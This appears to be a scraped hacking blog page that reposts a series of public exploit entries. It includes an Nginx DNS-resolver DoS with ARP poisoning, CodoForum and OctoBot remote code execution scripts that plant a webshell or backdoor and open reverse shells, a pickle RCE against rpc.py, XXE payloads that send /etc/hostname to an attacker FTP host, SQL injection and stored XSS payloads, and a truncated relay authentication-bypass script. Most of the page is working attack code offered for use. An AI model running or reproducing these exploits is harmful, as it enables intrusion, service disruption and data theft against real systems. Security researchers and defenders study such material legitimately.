# Exploit Title: Nginx 1.20.0 - Denial of Service (DOS)
# Date: 2022-6-29
# Exploit Author: Mohammed Alshehri - https://Github.com/M507
# Vendor Homepage: https://nginx.org/
# Software Link: https://github.com/nginx/nginx/releases/tag/release-1.20.0
# Version: 0.6.18 - 1.20.0
# Tested on: Ubuntu 18.04.4 LTS bionic
# CVE: CVE-2021-23017
# The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn
# python3 poc.py --target 172.1.16.100 --dns_server 172.1.16.1
# The service needs to be configured to use Nginx resolver
from scapy.all import *
from multiprocessing import Process
from binascii import hexlify, unhexlify
import argparse, time, os
def device_setup():
os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")
os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")
def ARPP(target, dns_server):
print("[*] Sending poisoned ARP packets")
target_mac = getmacbyip(target)
dns_server_mac = getmacbyip(dns_server)
while True:
time.sleep(2)
send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)
send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)
def exploit(target):
print("[*] Listening ")
sniff (filter="udp and port 53 and host " + target, prn = process_received_packet)
"""
RFC schema
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LENGTH | ID |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Q| OPCODE|A|T|R|R|Z|A|C| RCODE | QDCOUNT |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ANCOUNT | NSCOUNT |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ARCOUNT | QD |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| AN | NS |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| AR |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Fig. DNS
"""
def process_received_packet(received_packet):
if received_packet[IP].src == target_ip:
if received_packet.haslayer(DNS):
if DNSQR in received_packet:
print("[*] the received packet: " + str(bytes_hex(received_packet)))
print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))
try:
# \/ the received DNS request
dns_request = received_packet[DNS].build()
null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)
print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))
print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))
payload = [
dns_request[0:2],
b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",
dns_request[12:null_pointer_index+1],
dns_request[null_pointer_index+1:null_pointer_index+3],
dns_request[null_pointer_index+3:null_pointer_index+5],
b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",
b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41",
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",
b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"
]
payload = b"".join(payload)
spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\
UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\
payload)
print("[+] dns answer: "+str(hexlify(payload)))
print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))
sendp(spoofed_pkt, count=1)
print("\n[+] malicious answer was sent")
print("[+] exploited\n")
except:
print("\n[-] ERROR")
def main():
global target_ip
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="IP address of the target")
parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")
args = parser.parse_args()
target_ip = args.target
dns_server_ip = args.dns_server
device_setup()
processes_list = []
ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))
exploitProcess = Process(target=exploit,args=(target_ip,))
processes_list.append(ARPPProcess)
processes_list.append(exploitProcess)
for process in processes_list:
process.start()
for process in processes_list:
process.join()
if __name__ == '__main__':
target_ip = ""
main()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863113581
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Dr. Fone v4.0.8- 'net_updater32.exe' Unquoted Service Path
# Discovery Date: 2022-05-07
# Discovery by: Esant1490
# Vendor Homepage: https://drfone.wondershare.net
# Software Link : https://download.wondershare.net/drfone_full4008.exe
# Tested Version: 4.0.8
# Tested on OS: Windows 10 Pro x64 en
# Vulnerability Type: Unquoted Service Path
# Find the discover Unquoted Service Path Vulnerability:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "C:\Windows\\" |findstr /i /v """
Wondershare Install Assist Service Wondershare InstallAssist
C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto
Wondershare Application Framework Service WsAppService C:\Program Files
(x86)\Wondershare\WAF\2.4.3.243\WsAppService.exe Auto
Wondershare Application Update Service 3.0
WsAppService3 C:\Program Files
(x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Auto
Wondershare Driver Install Service WsDrvInst C:\Program Files
(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe Auto
# Service info:
C:\>sc qc WsDrvInst
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: WsDrvInst
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Wondershare Driver Install Service
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt to exploit this vulnerability could allow to execute
code during startup or reboot with the elevated privileges.
# Exploit Title: Magnolia CMS 6.2.19 - Stored Cross-Site Scripting (XSS)
# Date: 08/05/2022
# Exploit Author: Giulio Garzia 'Ozozuz'
# Vendor Homepage: https://www.magnolia-cms.com/
# Software Link: https://nexus.magnolia-cms.com/service/local/repositories/magnolia.public.releases/content/info/magnolia/bundle/magnolia-community-demo-webapp/6.2.19/magnolia-community-demo-webapp-6.2.19-tomcat-bundle.zip
# Version: 6.2.19
# Tested on: Linux, Windows, Docker
# CVE : CVE-2022-33098
Explanation
Malicious user with the permissions to upload profile picture for a contact, can upload an SVG file containing malicious JavaScript code that will be executed by anyone opening the malicious resource.
===== REQUEST =====
POST /magnoliaAuthor/.magnolia/admincentral/APP/UPLOAD/0/140/action/cba61868-b27a-4d50-983d-adf48b992be1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------399178799522967017241464837908
Content-Length: 620
Connection: close
Cookie: csrf=_WLVhBj-Vv-sdc37C4GBahMJ1tPS_7o_Y1VCEEw18Ks; JSESSIONID=F2678A586264F811C2746E4138BEF34D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
-----------------------------399178799522967017241464837908
Content-Disposition: form-data; name="140_file"; filename="xss.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('POC - Magnolia CMS');
</script>
</svg>
-----------------------------399178799522967017241464837908--
# Exploit Title: CodoForum v5.1 - Remote Code Execution (RCE)
# Date: 06/07/2022
# Exploit Author: Krish Pandey (@vikaran101)
# Vendor Homepage: https://codoforum.com/
# Software Link: https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip
# Version: CodoForum v5.1
# Tested on: Ubuntu 20.04
# CVE: CVE-2022-31854
#!/usr/bin/python3
import requests
import time
import optparse
import random
import string
banner = """
______ _______ ____ ___ ____ ____ _____ _ ___ ____ _ _
/ ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ // |( _ ) ___|| || |
| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \| |/ _ \___ \| || |_
| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) | | (_) |__) |__ _|
\____| \_/ |_____| |_____|\___/_____|_____| |____/|_|\___/____/ |_|
"""
print("\nCODOFORUM V5.1 ARBITRARY FILE UPLOAD TO RCE(Authenticated)")
print(banner)
print("\nExploit found and written by: @vikaran101\n")
parser = optparse.OptionParser()
parser.add_option('-t', '--target-url', action="store", dest='target', help='path of the CodoForum v5.1 install')
parser.add_option('-u', '--username', action="store", dest='username', help='admin username')
parser.add_option('-p', '--password', action="store", dest='password', help='admin password')
parser.add_option('-i', '--listener-ip', action="store", dest='ip', help='listener address')
parser.add_option('-n', '--port', action="store", dest='port', help='listener port number')
options, args = parser.parse_args()
proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
if not options.target or not options.username or not options.password or not options.ip or not options.port:
print("[-] Missing arguments!")
print("[*] Example usage: ./exploit.py -t [target url] -u [username] -p [password] -i [listener ip] -n [listener port]")
print("[*] Help menu: ./exploit.py -h OR ./exploit.py --help")
exit()
loginURL = options.target + '/admin/?page=login'
globalSettings = options.target + '/admin/index.php?page=config'
payloadURL = options.target + '/sites/default/assets/img/attachments/'
session = requests.Session()
randomFileName = ''.join((random.choice(string.ascii_lowercase) for x in range(10)))
def getPHPSESSID():
try:
get_PHPID = session.get(loginURL)
headerDict = get_PHPID.headers
cookies = headerDict['Set-Cookie'].split(';')[0].split('=')[1]
return cookies
except:
exit()
phpID = getPHPSESSID()
def login():
send_cookies = {'cf':'0'}
send_headers = {'Host': loginURL.split('/')[2], 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','Content-Type':'multipart/form-data; boundary=---------------------------2838079316671520531167093219','Content-Length':'295','Origin':loginURL.split('/')[2],'Connection':'close','Referer':loginURL,'Upgrade-Insecure-Requests':'1'}
send_creds = "-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"password\"\n\nadmin\n-----------------------------2838079316671520531167093219--"
auth = session.post(loginURL, headers=send_headers, cookies=send_cookies, data=send_creds, proxies=proxy)
if "CODOFORUM | Dashboard" in auth.text:
print("[+] Login successful")
def uploadAndExploit():
send_cookies = {'cf':'0', 'user_id':'1', 'PHPSESSID':phpID}
send_headers = {'Content-Type':'multipart/form-data; boundary=---------------------------7450086019562444223451102689'}
send_payload = '\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_title"\n\nCODOLOGIC\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_description"\n\ncodoforum - Enhancing your forum experience with next generation technology!\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="admin_email"\n\nadmin@codologic.com\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="default_timezone"\n\nEurope/London\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="register_pass_min"\n\n8\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_all_topics"\n\n30\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_cat_topics"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_per_topic"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_path"\n\nassets/img/attachments\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_exts"\n\njpg,jpeg,png,gif,pjpeg,bmp,txt\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_size"\n\n3\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_mimetypes"\n\nimage/*,text/plain\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_num"\n\n5\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_len"\n\n15\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="reply_min_chars"\n\n10\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="insert_oembed_videos"\n\nyes\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_privacy"\n\neveryone\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="approval_notify_mails"\n\n\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_header_menu"\n\nsite_title\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_logo"; filename="' + randomFileName + '.php"\nContent-Type: application/x-php\n\n<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ' + options.ip + ' ' + options.port + ' >/tmp/f");?> \n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="login_by"\n\nUSERNAME\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="force_https"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="user_redirect_after_login"\n\ntopics\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_hide_topic_messages"\n\noff\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_infinite_scrolling"\n\non\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="show_sticky_topics_without_permission"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="CSRF_token"\n\n23cc3019cadb6891ebd896ae9bde3d95\n-----------------------------7450086019562444223451102689--\n'
exploit = requests.post(globalSettings, headers=send_headers, cookies=send_cookies, data=send_payload, proxies=proxy)
print("[*] Checking webshell status and executing...")
payloadExec = session.get(payloadURL + randomFileName + '.php', proxies=proxy)
if payloadExec.status_code == 200:
print("[+] Payload uploaded successfully and executed, check listener")
else:
print("[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from " + payloadURL +"[file.php])")
login()
uploadAndExploit()
# Exploit Title: OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)
# Date: 9/2/2021
# Exploit Author: Samy Younsi, Thomas Knudsen
# Vendor Homepage: https://www.octobot.online/
# Software Link: https://github.com/Drakkar-Software/OctoBot
# Version: 0.4.0beta3 - 0.4.3
# Tested on: Linux (Ubuntu, CentOs)
# CVE : CVE-2021-36711
from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import zipfile
import time
import sys
import os
def banner():
sashimiLogo = """
_________ . .
(.. \_ , |\ /|
\ O \ /| \ \/ /
\______ \/ | \ /
vvvv\ \ | / |
_ _ _ _ \^^^^ == \_/ |
| | __ _ | || |__ (_)_ __ ___ (_)`\_ === \. |
/ __)/ _` / __| '_ \| | '_ ` _ \| |/ /\_ \ / |
\__ | (_| \__ | | | | | | | | | | ||/ \_ \| /
( /\__,_( |_| |_|_|_| |_| |_|_| \________/
|_| |_| \033[1;91mOctoBot Killer\033[1;m
Author: \033[1;92mNaqwada\033[1;m
RuptureFarm 1029
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(sashimiLogo))
def help():
print('[!] \033[1;93mUsage: \033[1;m')
print('[-] python3 {} --RHOST \033[1;92mTARGET_IP\033[1;m --RPORT \033[1;92mTARGET_PORT\033[1;m --LHOST \033[1;92mYOUR_IP\033[1;m --LPORT \033[1;92mYOUR_PORT\033[1;m'.format(sys.argv[0]))
print('[-] \033[1;93mNote*\033[1;m If you are using a hostname instead of an IP address please remove http:// or https:// and try again.')
def getOctobotVersion(RHOST, RPORT):
if RPORT == 443:
url = 'https://{}:{}/api/version'.format(RHOST, RPORT)
else:
url = 'http://{}:{}/api/version'.format(RHOST, RPORT)
return curl(url)
def restartOctobot(RHOST, RPORT):
if RPORT == 443:
url = 'https://{}:{}/commands/restart'.format(RHOST, RPORT)
else:
url = 'http://{}:{}/commands/restart'.format(RHOST, RPORT)
try:
requests.get(url, allow_redirects=False, verify=False, timeout=1)
except requests.exceptions.ConnectionError as e:
print('[+] \033[1;92mOctoBot is restarting ... Please wait 30 seconds.\033[1;m')
time.sleep(30)
def downloadTentaclePackage(octobotVersion):
print('[+] \033[1;92mStart downloading Tentacle package for OctoBot {}.\033[1;m'.format(octobotVersion))
url = 'https://static.octobot.online/tentacles/officials/packages/full/base/{}/any_platform.zip'.format(octobotVersion)
result = requests.get(url, stream=True)
with open('{}.zip'.format(octobotVersion), 'wb') as fd:
for chunk in result.iter_content(chunk_size=128):
fd.write(chunk)
print('[+] \033[1;92mDownload completed!\033[1;m')
def unzipTentaclePackage(octobotVersion):
zip = zipfile.ZipFile('{}.zip'.format(octobotVersion))
zip.extractall('quests')
os.remove('{}.zip'.format(octobotVersion))
print('[+] \033[1;92mTentacle package has been extracted.\033[1;m')
def craftBackdoor(octobotVersion):
print('[+] \033[1;92mCrafting backdoor for Octobot Tentacle Package {}...\033[1;m'.format(octobotVersion))
path = 'quests/reference_tentacles/Services/Interfaces/web_interface/api/'
injectInitFile(path)
injectMetadataFile(path)
print('[+] \033[1;92mSashimi malicious Tentacle Package for OctoBot {} created!\033[1;m'.format(octobotVersion))
def injectMetadataFile(path):
with open('{}metadata.py'.format(path),'r') as metadataFile:
content = metadataFile.read()
addPayload = content.replace('import json', ''.join('import json\nimport flask\nimport sys, socket, os, pty'))
addPayload = addPayload.replace('@api.api.route("/announcements")', ''.join('@api.api.route("/sashimi")\ndef sashimi():\n\ts = socket.socket()\n\ts.connect((flask.request.args.get("LHOST"), int(flask.request.args.get("LPORT"))))\n\t[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]\n\tpty.spawn("/bin/sh")\n\n\n@api.api.route("/announcements")'))
with open('{}metadata.py'.format(path),'w') as newMetadataFile:
newMetadataFile.write(addPayload)
def injectInitFile(path):
with open('{}__init__.py'.format(path),'r') as initFile:
content = initFile.read()
addPayload = content.replace('announcements,', ''.join('announcements,\n\tsashimi,'))
addPayload = addPayload.replace('"announcements",', ''.join('"announcements",\n\t"sashimi",'))
with open('{}__init__.py'.format(path),'w') as newInitFile:
newInitFile.write(addPayload)
def rePackTentaclePackage():
print('[+] \033[1;92mRepacking Tentacle package.\033[1;m')
with zipfile.ZipFile('any_platform.zip', mode='w') as zipf:
len_dir_path = len('quests')
for root, _, files in os.walk('quests'):
for file in files:
file_path = os.path.join(root, file)
zipf.write(file_path, file_path[len_dir_path:])
def uploadMaliciousTentacle():
print('[+] \033[1;92mUploading Sashimi malicious Tentacle .ZIP package on anonfiles.com" link="https://app.recordedfuture.com/live/sc/entity/idn:anonfiles.com" style="">anonfiles.com... May take a minute.\033[1;m')
file = {
'file': open('any_platform.zip', 'rb'),
}
response = requests.post('https://api.anonfiles.com/upload', files=file, timeout=60)
zipLink = response.json()['data']['file']['url']['full']
response = requests.get(zipLink, timeout=60)
soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
zipLink = soup.find(id='download-url').get('href')
print('[+] \033[1;92mSashimi malicious Tentacle has been successfully uploaded. {}\033[1;m'.format(zipLink))
return zipLink
def curl(url):
response = requests.get(url, allow_redirects=False, verify=False, timeout=60)
return response
def injectBackdoor(RHOST, RPORT, zipLink):
print('[+] \033[1;92mInjecting Sashimi malicious Tentacle packages in Ocotobot... May take a minute.\033[1;m')
if RPORT == 443:
url = 'https://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT)
else:
url = 'http://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT)
headers = {
'Content-Type': 'application/json',
'X-Requested-With': 'XMLHttpRequest',
}
data = '{"'+zipLink+'":"register_and_install"}'
response = requests.post(url, headers=headers, data=data)
response = response.content.decode('utf-8').replace('"', '').strip()
os.remove('any_platform.zip')
if response != 'Tentacles installed':
print('[!] \033[1;91mError: Something went wrong while trying to install the malicious Tentacle package.\033[1;m')
exit()
print('[+] \033[1;92mSashimi malicious Tentacle package has been successfully installed on the OctoBot target.\033[1;m')
def execReverseShell(RHOST, RPORT, LHOST, LPORT):
print('[+] \033[1;92mExecuting reverse shell on {}:{}.\033[1;m'.format(LHOST, LPORT))
if RPORT == 443:
url = 'https://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)
else:
url = 'http://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)
return curl(url)
def isPassword(RHOST, RPORT):
if RPORT == 443:
url = 'https://{}:{}'.format(RHOST, RPORT)
else:
url = 'http://{}:{}'.format(RHOST, RPORT)
return curl(url)
def main():
banner()
args = parser.parse_args()
if isPassword(args.RHOST, args.RPORT).status_code != 200:
print('[!] \033[1;91mError: This Octobot Platform seems to be protected with a password!\033[1;m')
octobotVersion = getOctobotVersion(args.RHOST, args.RPORT).content.decode('utf-8').replace('"','').replace('OctoBot ','')
if len(octobotVersion) > 0:
print('[+] \033[1;92mPlatform OctoBot {} detected.\033[1;m'.format(octobotVersion))
downloadTentaclePackage(octobotVersion)
unzipTentaclePackage(octobotVersion)
craftBackdoor(octobotVersion)
rePackTentaclePackage()
zipLink = uploadMaliciousTentacle()
injectBackdoor(args.RHOST, args.RPORT, zipLink)
restartOctobot(args.RHOST, args.RPORT)
execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='POC script that exploits the Tentacles upload functionalities on OctoBot. A vulnerability has been found and can execute a reverse shell by crafting a malicious packet. Version affected from 0.4.0b3 to 0.4.0b10 so far.', add_help=False)
parser.add_argument('-h', '--help', help=help())
parser.add_argument('--RHOST', help="Refers to the IP of the target machine.", type=str, required=True)
parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)
parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
main()
# Title: WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi
# Author: nu11secur1ty
# Date: 07.11.2022
# Vendor: https://wphive.com/
# Software: https://wphive.com/plugins/wp-visual-slidebox-builder/?plugin_version=3.2.9
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin
## Description:
The parameter `idx` from the Visual Slide Box Builder plugin app for
WordPress appears to be vulnerable to SQLi.
The attacker can receive all database information from the WordPress
database and he can use it for very malicious purposes.
[+] Payloads:
```mysql
---
Parameter: idx (GET)
Type: boolean-based blind
Title: HAVING boolean-based blind - WHERE, GROUP BY clause
Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)
HAVING 1854=1854
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)
AND (SELECT 3837 FROM (SELECT(SLEEP(7)))QHbL)
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: action=vsbb_get_one&idx=-5038 UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x716a626a71,0x4e6b417358754d527a4a69544c57654a53574a64736b5a656e4b7968767a7a4d454243797a796d72,0x717a7a7a71),NULL,NULL#
---
```
# Exploit Title: Geonetwork 4.2.0 - XML External Entity (XXE)
# Date: 2022-July-11
# Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb)
# Vendor Homepage: https://geonetwork-opensource.org/
# Version: Geonetwork 3.10.X through 4.2.0
# Tested on: Microsoft Windows Server & Linux
# Description:
# GeoNetwork 3.1.x through 4.2.0
# During rendering pdf of map.
# The XML parser is now configured securely to validate submitted XML document accepted from an untrusted source, which might result in arbitrary files retrieval from the server.
====================PDF RENDERING====================
POST /geonetwork/pdf/create.json HTTP/1.1
Host: REDACTED
Content-Type: application/json
Connection: close
Content-Length: 563
{"layout":"landscape","srs":"","units":"m","rotation":0,"lang":"fre","dpi":"190","outputFormat":"pdf","layers":[{"opacity":1,"type":"mapServer","baseURL":"http://attacker/xxe.xml","layers":["Tracts",],
"format":"image/svg+xml","name":"xxe","extent":[-20037508.34,-20037508.34,20037508.34,
20037508.34],
"tileSize":[256,256]}],"enableLegends":true,"hasTitle":true,"hasNoTitle":false,"hasAttribution":false,"pages":[{"center":[172063.3620639667,4200083.030736061],"scale":"2.5E7","dataOwner":"© ","rotation":0,"comment":"ok","title":"ok","langfre":true}]}
The parameters baseURL will be your XML files :
====================XXE_ATTACK====================
====================XXE.XML=======================
<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://ATTACKER/x.dtd"> %pe; %param1; ]>
<foo>&external;</foo>
====================X.dtd=========================
They will call the x.dtd
<!ENTITY % stuff SYSTEM "file:///etc/hostname">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'ftp://ATTACKER_FTP/%stuff;'>">
# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2022-07-12
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/abersheeran
# Software Link: https://github.com/abersheeran/rpc.py
# Version: v0.4.2 - v0.6.0
# Tested on: Debian 11, Ubuntu 20.04
# CVE : CVE-2022-35411
import requests
import pickle
# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py
HOST =3D "127.0.0.1:65432"
URL =3D f"http://{HOST}/sayhi"
HEADERS =3D {
"serializer": "pickle"
}
def generate_payload(cmd):
class PickleRce(object):
def __reduce__(self):
import os
return os.system, (cmd,)
payload =3D pickle.dumps(PickleRce())
print(payload)
return payload
def exec_command(cmd):
payload =3D generate_payload(cmd)
requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)
def main():
exec_command('curl http://127.0.0.1:4321')
# exec_command('uname -a')
if __name__ =3D=3D "__main__":
main()
# Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path
# Date: 07/14/2022
# Exploit Author: Angelo Pio Amirante
# Version: 1.0.0.4
# Tested on: Windows 10
# Patched version: 1.0.5.0
# CVE: CVE-2022-35899
# Step to discover the unquoted service path:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# Info on the service:
C:\>sc qc "GameSDK Service"
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: GameSDK Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : GameSDK Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
# Exploit
If an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS\" folder or in "C:\" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe".
# Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass
# Google Dork: NA
# Date: 13th July 2022
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
# Author Github Page: https://9lyph.github.io/CVE-2022-29593/
# Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html
# Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download
# Version: V3.1.276A
# Tested on: MAC OSX
# CVE : CVE-2022-29593#!/usr/local/bin/python3
# Author: Victor Hanna (SpiderLabs)
# DingTian DT-R002 2CH Smart Relay
# CWE-294 - Authentication Bypass by Capture-replay
import requests
import re
import urllib.parse
from colorama import init
from colorama import Fore, Back, Style
import sys
import os
import time
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def banner():
print ("[+]********************************************************************************[+]")
print ("| Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t |")
print ("| Description: DingTian DT-R002 2CH Smart Relay |")
print ("| Usage : "+sys.argv[0]+" <host> <relay#> |")
print ("[+]********************************************************************************[+]")
def main():
os.system('clear')
banner()
urlRelay1On = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0&"
